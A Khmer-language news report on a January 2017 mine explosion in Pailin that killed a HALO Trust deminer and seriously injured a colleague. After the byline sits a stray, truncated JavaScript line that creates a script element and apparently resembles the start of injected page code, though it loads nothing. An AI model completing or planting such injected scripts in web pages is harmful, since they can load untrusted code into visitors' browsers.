Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

បុគ្គលិកអង្គភាពកំចាត់មីន Hallo ស្លាប់ម្នាក់ របួសធ្ងន់ម្នាក់ ដោយសារផ្ទុះមីន

ខេត្តប៉ៃលិន៖ កាលពីវេលាម៉ោង ០៧:៣០នាទីព្រឹកថ្ងៃទី ១៣ ខែមករា ឆ្នាំ២០១៧ មានករណីផ្ទុះគ្រាប់មីន បណ្តាលឱ្យបុគ្គលិកអង្គភាពកំចាត់មីន Hallo ស្លាប់ម្នាក់ និងរងរបួសធ្ងន់ម្នាក់ នៅចំណុច អូរតាផៃ ស្ថិតក្នុងភូមិបរហ៊ុយជើង សង្កាត់បរយ៉ាខា ក្រុងប៉ៃលិន ខេត្តប៉ៃលិន។ ជនរងគ្រោះទីមួយឈ្មោះ លឿង រស្មី ភេទប្រុស អាយុ ៥៥ឆ្នាំ មុខរបរបុគ្គលិកអង្គភាពកំចាត់មីន Hallo រស់នៅភូមិក្រពើជើង ឃុំភ្នំសំពៅ ស្រុកបាណន់ ខេត្តបាត់ដំបង ស្លាប់នៅនឹងកន្លែងកើតហេតុ ចំណែកជនរងគ្រោះទីពីរឈ្មោះ ងុយ ថានី ភេទស្រី អាយុ ២៨ឆ្នាំ មុខរបរបុគ្គលិកអង្គភាពកំចាត់មីន Hallo រស់នៅភូមិអូរសំរិល ស្រុកសំឡូត ខេត្តបាត់ដំបង រងរបួសធ្ងន់ ត្រូវបានឧទ្ធម្ភាគចក្រ ដឹកយកទៅ សង្គោះបន្ទាន់នៅមន្ទីរពេទ្យឯរាជធានីភ្នំពេញ ចំណែកសាកសពជនរងគ្រោះត្រូវបានរក្សាទុកនៅទីស្នាក់ការអង្គភាពកំចាត់មីន Hallo ដើម្បីរងចាំសាច់ញាតិយកទៅធ្វើបុណ្យតាមប្រពៃណី។
បើតាមសក្សីបានបញ្ជាក់ថា៖ ហេតុការណ៍ខាងលើនេះកើតឡើងបណ្តាលមកពីជនរងគ្រោះឈ្មោះ លឿង រស្មី (ស្លាប់) បានរាវរកឃើញមីនប្រភេទ GYATA រួចក៍ធ្វើការដោះ ដើម្បីយកទៅកម្ទេចចោល តែធ្វើមិនបានជោគជ័យ បណ្តាលឱ្យផ្ទុះ ស្លាប់បាត់បង់ជីវិតខ្លួនឯង និងបណ្តាលអោយនារីរងគ្រោះម្នាក់ទៀតឈ្មោះ ងុយ ថានី (រងរបួសធ្ងន់) ដែលធ្វើការរុករកមីននៅក្បែរគ្នានោះ។ដោយ៖ញ៉ឹប បូរី

var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More